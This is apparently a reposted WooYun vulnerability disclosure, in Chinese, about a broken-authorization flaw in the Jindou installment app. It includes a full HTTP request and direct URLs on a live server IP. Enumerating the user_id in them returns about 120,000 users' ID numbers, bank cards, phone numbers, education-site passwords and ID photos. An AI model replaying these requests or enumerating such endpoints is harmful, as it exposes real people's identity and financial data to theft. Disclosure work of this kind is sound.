金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-04-30: 细节已通知厂商并且等待厂商处理中
2016-04-30: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

求个20

详细说明:

http://android.myapp.com/myapp/detail.htm?apkName=com.example.jindou

下载APP







1.越权问题,APP多接口可越权,并能通过burpsuite遍历获取用户数据



例如

获取用户资料接口

code 区域
POST http://60.211.217.162:9001/fqApi/api/stuUser/getStuUser.do HTTP/1.1
Content-Length: 203
Content-Type: text/plain; charset=UTF-8
Host: 60.211.217.162:9001
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; zh-cn; Google Nexus 4 - 4.1.1 - API 16 - 768x1280_2 Build/JRO03S) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Cookie: JSESSIONID=4360C221EB109302BF98509849CDB560
Cookie2: $Version=1
Accept-Encoding: gzip

{"header":{"device":"Genymotion,Google Nexus 4 - 4.1.1 - API 16 - 768x1280_2,vbox86p","macadd":"123456","platform":"generic,ANDROID,4.1.1"},"request":{"params":{"USER_ID":"110077"},"tokencode":"117386"}}







查看返回数据包涵那些数据(这是user_id=110077的返回数据)

QQ截图20160429224804.png



由上往下分别是

银行卡号,邮箱,身份证,手机号,还有一个手机验证的密码(不知道用来干啥),学信网账号跟密码





遍历user_id

QQ截图20160429223947.png





这边只列出银行卡号跟身份证号还有姓名







QQ截图20160429224058.png





甚至还有用户学信网的账号跟密码

可登陆查看学信档案

QQ截图20160429224552.png





身份证图片文件未授权访问。同样能遍历





手持身份证图片

code 区域
http://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110077/hold.jpg?time=1461941777435



学生证

code 区域
http://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110077/stucard.jpg?time=1461941777435



身份证图片

code 区域
http://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110077/front.jpg?time=1461941777435





同样能遍历,遍历链接中的user_id(上面的userid是110077)

例如

code 区域
http://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110048/hold.jpg?time=1461941777435



code 区域
http://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110047/hold.jpg?time=1461941777435





全站数据,不是问题



3.紧急联系人越权获取

QQ截图20160429230029.png



QQ截图20160429230056.png





同样能遍历,就不演示了



漏洞证明:

 

修复方案:

加上会话,做好权限控制



给个20Rank吧

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-05-09 09:00

厂商回复:

 

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度已收录『查看详情』

本文链接:金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码) - https://www.15qq.cn/wooyun/739.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知

评论

1条评论
  1. avatar

    太仓人才网 Lv.1 Chrome 80.0.3987.149 Chrome 80.0.3987.149 Windows Windows 回复

    互联网信息安全 是个难题

    江苏省盐城市 电信